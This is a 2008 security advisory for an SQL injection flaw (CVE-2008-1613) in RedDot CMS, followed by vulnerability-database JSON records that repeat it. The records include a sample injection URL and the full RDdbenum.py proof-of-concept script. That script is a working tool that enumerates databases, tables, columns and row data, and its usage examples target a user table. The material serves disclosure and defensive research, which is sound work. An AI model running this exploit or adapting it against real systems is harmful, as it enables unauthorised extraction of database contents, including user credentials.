RedDot CMS SQL injection vulnerability (CVE Number: CVE-2008-1613)
http://www.irmplc.com/index.php/167-Advisory-026
Vulnerability Type/Importance: SQL injection/Critical
Problem Discovered: 12 February 2008
Vendor Contacted: 19 February 2008
Advisory Published: 21 April 2008
Abstract:
The RedDot CMS Product (http://www.reddot.com) is vulnerable to a
pre-authentication SQL injection vulnerability which, when exploited,
allows enumeration of all SQL database content.
Description:
The 'LngId' Parameter passed to IoRD.asp is responsible for assigning
the language context for the CMS application. The vulnerability exists
as a result of inadequate validation of user-supplied input within this
parameter.
Technical Details:
Normal input for the 'LngId' parameter contains a code such as ENG, DEU,
JP, denoting the language type. This parameter is not properly validated
and the injection of SQL statements within it allows attackers
unrestricted access to enumerate information from the database. For
example:
https://vulnerablehost.com:443/cms/ioRD.asp?Action=ShowMessage&LngId=ENG
.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where
xtype=char(85) and name> '' ORDER BY 1;-- &DisableAutoLogin=1
Proof of Concept:
A Proof of Concept (RDdbenum.py) has been developed to automate
enumeration of entire database content available from
http://www.irmplc.com/Tools/RDdbenum.py
Workaround / Solutions:
There are no known workarounds for this vulnerability
The Vendor has released a patch for this vulnerability, Release
7.5.1.86, available from normal Red Dot customer support contacts.
Tested / Affected Versions:
IRM confirmed the presence of this vulnerability in RedDot CMS version
7.5 Build 7.5.0.48, tested with Microsoft SQL Server 2005 database.
It is believed that this issue exists in RedDot CMS versions 6.5 and
7.0; however this has not been fully verified.
Credits:
Research and Advisory: Mark Crowther and Rodrigo Marcos
Disclaimer:
All information in this advisory is provided on an 'as is' basis in the
hope that it will be useful. Information Risk Management Plc is not
responsible for any risks or occurrences caused by the application of
this information.
{"id": "SECURITYVULNS:DOC:19708", "bulletinFamily": "software", "title": "[Full-disclosure] IRM Security Advisory : RedDot CMS SQL injection vulnerability", "description": "RedDot CMS SQL injection vulnerability (CVE Number: CVE-2008-1613)\r\n\r\n \r\n\r\nhttp://www.irmplc.com/index.php/167-Advisory-026\r\n\r\n \r\n\r\n \r\n\r\nVulnerability Type/Importance: SQL injection/Critical\r\n\r\n \r\n\r\nProblem Discovered: 12 February 2008\r\n\r\nVendor Contacted: 19 February 2008\r\n\r\nAdvisory Published: 21 April 2008\r\n\r\n \r\n\r\n \r\n\r\nAbstract:\r\n\r\nThe RedDot CMS Product (http://www.reddot.com) is vulnerable to a\r\npre-authentication SQL injection vulnerability which, when exploited,\r\nallows enumeration of all SQL database content.\r\n\r\n \r\n\r\nDescription:\r\n\r\nThe 'LngId' Parameter passed to IoRD.asp is responsible for assigning\r\nthe language context for the CMS application. The vulnerability exists\r\nas a result of inadequate validation of user-supplied input within this\r\nparameter.\r\n\r\n \r\n\r\n \r\n\r\nTechnical Details:\r\n\r\nNormal input for the 'LngId' parameter contains a code such as ENG, DEU,\r\nJP, denoting the language type. This parameter is not properly validated\r\nand the injection of SQL statements within it allows attackers\r\nunrestricted access to enumerate information from the database. For\r\nexample:\r\n\r\n \r\n\r\nhttps://vulnerablehost.com:443/cms/ioRD.asp?Action=ShowMessage&LngId=ENG\r\n.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where\r\nxtype=char(85) and name> '' ORDER BY 1;-- &DisableAutoLogin=1\r\n\r\n \r\n\r\nProof of Concept:\r\n\r\nA Proof of Concept (RDdbenum.py) has been developed to automate\r\nenumeration of entire database content available from\r\nhttp://www.irmplc.com/Tools/RDdbenum.py\r\n\r\n \r\n\r\n \r\n\r\nWorkaround / Solutions:\r\n\r\nThere are no known workarounds for this vulnerability\r\n\r\nThe Vendor has released a patch for this vulnerability, Release\r\n7.5.1.86, available from normal Red Dot customer support contacts.\r\n\r\n \r\n\r\n \r\n\r\nTested / Affected Versions:\r\n\r\nIRM confirmed the presence of this vulnerability in RedDot CMS version\r\n7.5 Build 7.5.0.48, tested with Microsoft SQL Server 2005 database.\r\n\r\nIt is believed that this issue exists in RedDot CMS versions 6.5 and\r\n7.0; however this has not been fully verified.\r\n\r\n \r\n\r\n \r\n\r\nCredits:\r\n\r\nResearch and Advisory: Mark Crowther and Rodrigo Marcos\r\n\r\n \r\n\r\n \r\n\r\nDisclaimer:\r\n\r\nAll information in this advisory is provided on an 'as is' basis in the\r\nhope that it will be useful. Information Risk Management Plc is not\r\nresponsible for any risks or occurrences caused by the application of\r\nthis information.\r\n\r\n \r\n\r\n \r\n", "published": "2008-04-21T00:00:00", "modified": "2008-04-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19708", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2008-1613"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:26", "edition": 1, "viewCount": 7, "enchantments": {"score": {"value": 5.9, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2008-1613"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:65706"]}]}, "exploitation": null, "vulnersScore": 5.9}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645313552}}
{"securityvulns": [{"lastseen": "2021-06-08T18:44:25", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2008-04-21T00:00:00", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2008-1613"], "modified": "2008-04-21T00:00:00", "id": "SECURITYVULNS:VULN:8931", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8931", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2022-03-23T11:59:14", "description": "SQL injection vulnerability in ioRD.asp in RedDot CMS 7.5 Build 7.5.0.48, and possibly other versions including 6.5 and 7.0, allows remote attackers to execute arbitrary SQL commands via the LngId parameter.", "cvss3": {}, "published": "2008-04-22T04:41:00", "type": "cve", "title": "CVE-2008-1613", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1613"], "modified": "2018-10-11T20:35:00", "cpe": ["cpe:/a:reddot:cms:7.5", "cpe:/a:reddot:cms:7.0", "cpe:/a:reddot:cms:6.5"], "id": "CVE-2008-1613", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1613", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:reddot:cms:7.5:build_7.5.0.48:*:*:*:*:*:*", "cpe:2.3:a:reddot:cms:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:reddot:cms:6.5:*:*:*:*:*:*:*"]}], "seebug": [{"lastseen": "2017-11-19T21:42:46", "description": "BUGTRAQ ID: 28872\r\nCVE(CAN) ID: CVE-2008-1613\r\n\r\nRedDot CMS\u662f\u4e00\u6b3e\u7f51\u7ad9\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf\u3002\r\n\r\nRedDot CMS\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u8f93\u5165\u9a8c\u8bc1\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u6267\u884cSQL\u6ce8\u5165\u653b\u51fb\u3002\r\n\r\n\u4f20\u9001\u7ed9RedDot CMS\u7684IoRD.asp\u6587\u4ef6\u7684LngId\u53c2\u6570\u8d1f\u8d23\u5206\u914dCMS\u5e94\u7528\u7684\u8bed\u8a00\u73af\u5883\u3002\u7531\u4e8e\u6ca1\u6709\u6b63\u786e\u5730\u9a8c\u8bc1\u8be5\u53c2\u6570\u4fbf\u5728SQL\u8bed\u53e5\u4e2d\u4f7f\u7528\uff0c\u56e0\u6b64\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7SQL\u6ce8\u5165\u653b\u51fb\u7ed5\u8fc7\u9650\u5236\u8bbf\u95ee\u6570\u636e\u5e93\uff0c\u4ece\u6570\u636e\u5e93\u4e2d\u679a\u4e3e\u4fe1\u606f\u3002\r\n\r\n\n\nRedDot CMS 7.5.1\n RedDot\r\n------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=http://www.reddot.com/products_web_content_management.htm target=_blank>http://www.reddot.com/products_web_content_management.htm</a>", "cvss3": {}, "published": "2008-04-24T00:00:00", "type": "seebug", "title": "RedDot CMS ioRD.asp\u6587\u4ef6SQL\u6ce8\u5165\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-1613"], "modified": "2008-04-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-3215", "id": "SSV:3215", "sourceData": "\n https://vulnerablehost.com:443/cms/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '' ORDER \n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-3215", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:36", "description": "", "cvss3": {}, "published": "2008-04-21T00:00:00", "type": "packetstorm", "title": "reddot-sql.txt", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-1613"], "modified": "2008-04-21T00:00:00", "id": "PACKETSTORM:65705", "href": "https://packetstormsecurity.com/files/65705/reddot-sql.txt.html", "sourceData": "`RedDot CMS SQL injection vulnerability (CVE Number: CVE-2008-1613) \n \nhttp://www.irmplc.com/index.php/167-Advisory-026 \n \n \nVulnerability Type/Importance: SQL injection/Critical \n \nProblem Discovered: 12 February 2008 \nVendor Contacted: 19 February 2008 \nAdvisory Published: 21 April 2008 \n \n \nAbstract: \nThe RedDot CMS Product (http://www.reddot.com) is vulnerable to a pre-authentication SQL injection vulnerability which, when exploited, allows enumeration of all SQL database content. \n \nDescription: \nThe 'LngId' Parameter passed to IoRD.asp is responsible for assigning the language context for the CMS application. The vulnerability exists as a result of inadequate validation of user-supplied input within this parameter. \n \n \nTechnical Details: \nNormal input for the 'LngId' parameter contains a code such as ENG, DEU, JP, denoting the language type. This parameter is not properly validated and the injection of SQL statements within it allows attackers unrestricted access to enumerate information from the database. For example: \n \nhttps://vulnerablehost.com:443/cms/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '' ORDER BY 1;-- &DisableAutoLogin=1 \n \nProof of Concept: \nA Proof of Concept (RDdbenum.py) has been developed to automate enumeration of entire database content available from http://www.irmplc.com/Tools/RDdbenum.py \n \n \nWorkaround / Solutions: \nThere are no known workarounds for this vulnerability \nThe Vendor has released a patch for this vulnerability, Release 7.5.1.86, available from normal Red Dot customer support contacts. \n \n \nTested / Affected Versions: \nIRM confirmed the presence of this vulnerability in RedDot CMS version 7.5 Build 7.5.0.48, tested with Microsoft SQL Server 2005 database. \nIt is believed that this issue exists in RedDot CMS versions 6.5 and 7.0; however this has not been fully verified. \n \n \nCredits: \nResearch and Advisory: Mark Crowther and Rodrigo Marcos \n \n \nDisclaimer: \nAll information in this advisory is provided on an 'as is' basis in the hope that it will be useful. Information Risk Management Plc is not responsible for any risks or occurrences caused by the application of this information. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/65705/reddot-sql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:22:32", "description": "", "cvss3": {}, "published": "2008-04-21T00:00:00", "type": "packetstorm", "title": "RDdbenum.py.txt", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-1613"], "modified": "2008-04-21T00:00:00", "id": "PACKETSTORM:65706", "href": "https://packetstormsecurity.com/files/65706/RDdbenum.py.txt.html", "sourceData": "`#!/usr/bin/env python \n \n# un-comment your selection. \n \nimport urllib2 \nimport urllib \nimport string \nimport getopt \nimport sys \n \ndef banner(): \nprint \nprint \"RED DOT CMS 7.5 database enumeration\" \nprint \"by Mark Crowther and Rodrigo Marcos\" \n \ndef usage(): \nprint \nprint \"usage():\" \nprint \"python RD_POC.py [options] URL\" \nprint \nprint \" [options]\" \nprint \" --dbenum: Database enumeration\" \nprint \" --tableenum: Table enumeration, use -d to specify database\" \nprint \" --colenum: Column enumeration, use -d to specify database and -t to specify table\" \nprint \" --dataenum: Data enumeration, use -d to specify database, -t to specify table and -c to specify a column\" \nprint \" -d: Specify a database\" \nprint \" -t: Specify a table\" \nprint \" -c: Specify a column\" \nprint \" -h: Help page\" \nprint \nprint \"Examples: \" \nprint \" python RD_POC.py --dbenum http://myhost/cms/\" \nprint \" python RD_POC.py --tableenum -d IoAdministration http://myhost/cms/\" \nprint \" python RD_POC.py --colenum -d IoAdministration -t IO_USR http://myhost/cms/\" \nprint \" python RD_POC.py --dataenum -d IoAdministration -t IO_USR -c USR2 http://myhost/cms/\" \nprint \nsys.exit() \n \ndef retrievedata(url1, url2 = \"' ORDER BY 1;-- &DisableAutoLogin=1\"): \nstop = 0 \n \ncurrent = '' \n \nwhile (stop==0): \n \nrequest = url1 + current + url2 \n \nrequest = string.replace(request, ' ', '%20') \nreq = urllib2.Request(request) \ntry: \nr = urllib2.urlopen(req) \nexcept urllib2.URLError, msg: \nprint \"[+] Error: Error requesting URL (%s)\" % msg \nresult = r.read() \n \n#print result \nif string.find(result, ' Description Conversion failed when converting the ') == -1: \nstop = 1 \nelse: \nstart = string.find(result, \"'\") + 1 \nend = string.find(result[start:], \"'\") + start \ncurrent = result[start:end] \nprint current \n \n \ndef dbenum(): \n \nretrievedata(url + \"/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYS.SYSDATABASES where name> '\") \n \ndef tableenum(database=''): \n \nif database=='': \nretrievedata(url + \"/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '\") \n \nelse: \nretrievedata(url + \"/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM \" + database + \"..SYSOBJECTS where xtype=char(85) and name> '\") \n \ndef colenum(table, database=''): \n \nif table=='': \nusage() \n \nif database=='': \nretrievedata(url + \"/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSCOLUMNS where name > '\", \"' AND id = (SELECT id from SYSOBJECTS WHERE name= '\" + table + \"') ORDER BY 1;-- &DisableAutoLogin=1\") \nelse: \nretrievedata(url + \"/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM \" + database + \"..SYSCOLUMNS where name > '\",\"' AND id = (SELECT id from \" + database + \"..SYSOBJECTS WHERE name= '\" + table + \"') ORDER BY 1;-- &DisableAutoLogin=1\") \n \n \ndef dataenum(column, table, database=''): \n \nif column=='' or table=='': \nusage() \n \nif database=='': \nretrievedata(url + \"/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(\" + column + \") FROM \" + table + \" WHERE \" + column + \"> '\") \n \nelse: \nretrievedata(url + \"/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT MIN(\" + column + \") FROM \" + database + \"..\" + table + \" WHERE \" + column + \"> '\") \n \n \nbanner() \npdbenum = 0 \nptableenum = 0 \npcolenum = 0 \npdataenum = 0 \ndatabase = '' \ntable = '' \ncolumn = '' \n \nurl = sys.argv[len(sys.argv)-1] \n \ntry: \nopts, args = getopt.getopt(sys.argv[1:], \"d:t:c:h:\", [\"help\", \"dbenum\", \"tableenum\", \"colenum\", \"dataenum\"]) \nexcept getopt.GetoptError: \nusage() \n \ntry: \nfor o, a in opts: \nif o in (\"-h\", \"--help\"): \nusage() \nif o == \"--dbenum\": \npdbenum = 1 \nif o == \"--tableenum\": \nptableenum = 1 \nif o == \"--colenum\": \npcolenum = 1 \nif o == \"--dataenum\": \npdataenum = 1 \nif o == \"-d\": \ndatabase = a \nif o == \"-t\": \ntable = a \nif o == \"-c\": \ncolumn = a \nexcept: \nusage() \n \n \nif pdbenum == 1: \nprint 'Enumerating databases:' \ndbenum() \nelif ptableenum == 1: \nprint 'Enumerating tables:' \ntableenum(database) \nelif pcolenum == 1: \nprint 'Enumerating columns:' \ncolenum(table, database) \nelif pdataenum == 1: \nprint 'Enumerating data:' \ndataenum(column, table, database) \nelse: \nusage() \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/65706/RDdbenum.py.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}